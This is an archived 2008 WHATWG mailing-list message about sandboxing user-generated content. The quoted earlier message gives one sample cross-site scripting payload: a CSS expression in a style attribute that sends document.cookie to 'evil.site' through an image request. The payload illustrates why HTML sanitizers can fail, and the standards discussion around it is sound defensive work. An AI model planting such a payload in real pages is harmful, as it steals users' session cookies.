- From: Kristof Zelechovski <giecrilj@stegny.2a.pl>
- Date: Tue, 17 Jun 2008 23:36:23 +0200
This particular explanation is irrelevant to the topic because sandboxed fragments can contain scripts, whether within CSS or not. The idea of sandboxing is to disable scripts, not to purge them. Chris -----Original Message----- From: whatwg-bounces@lists.whatwg.org [mailto:whatwg-bounces at lists.whatwg.org] On Behalf Of Frode Borli Sent: Tuesday, June 17, 2008 8:34 PM To: Kristof Zelechovski Cc: whatwg at lists.whatwg.org Subject: Re: [whatwg] Sandboxing to accommodate user generated content. > 1. Please elaborate how an extension of CSS would require a sanitizer > update. In the year 1998: A sanitizer algorithm works perfectly for all existing methods of adding scripts. It uses a white list, which allows only certain tags and attributes. Among the allowed attributes is colspan, rowspan and style - since the web developer wants users to be able to build tables and style them properly. In the year 1999 Internet Explorer 5.0 is introduced, and it introduces a new invention; CSS-expressions. Suddenly the formerly secure webapplication is no longer secure. A user adds the following code, and it passes the sanitizer easily: <span style='color: blue; width: expression(document.write("<img src=http://evil.site/"+document.cookie));'></span> I am absolutely certain that there will be other, brilliant inventions in the future which will break sanitizers - ofcourse we can't know which inventions today - but the sandboxing means that browser vendors in the future can prevent the above scenario.
Received on Tuesday, 17 June 2008 14:36:23 UTC